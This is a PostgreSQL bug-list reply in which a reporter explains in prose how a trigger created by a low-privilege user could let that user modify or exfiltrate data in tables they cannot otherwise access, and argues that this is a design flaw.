| From: | ZhangChi <798604270(at)qq(dot)com> |
|---|---|
| To: | Laurenz Albe <laurenz(dot)albe(at)cybertec(dot)at>, pgsql-bugs <pgsql-bugs(at)lists(dot)postgresql(dot)org> |
| Subject: | Re: BUG #18936: Trigger enable users to modify the tables which hedoesn't have privilege |
| Date: | 2025-05-24 03:06:24 |
| Message-ID: | tencent_6FB22713DA38A8D08B25F3DDD06B9C792B07@qq.com |
| Views: | Raw Message | Whole Thread | Download mbox | Resend email |
| Thread: | |
| Lists: | pgsql-bugs |
Thanks for your reply!
However, it is common in some database servers for an attacker to gain minimal privileges on a single table within a target database. For instance, when registering an account on a service, the system might grant the user access to a dedicated table. Using the TRIGGER mechanism as I showed, such an attacker could then delete or exfiltrate data from other tables beyond their authorized access. Notably, this attack doesn't require superuser privileges - only access to the two relevant tables.
Permitting users to create triggers that can affect tables beyond their privilege scope appears to be a problematic design choice. Such triggers may be inadvertently executed by privileged users without their knowledge, creating potential security vulnerabilities.
| From | Date | Subject | |
|---|---|---|---|
| Next Message | Laurenz Albe | 2025-05-24 05:09:56 | Re: BUG #18936: Trigger enable users to modify the tables which hedoesn't have privilege |
| Previous Message | Masahiko Sawada | 2025-05-23 17:31:54 | Re: Logical replication 'invalid memory alloc request size 1585837200' after upgrading to 17.5 |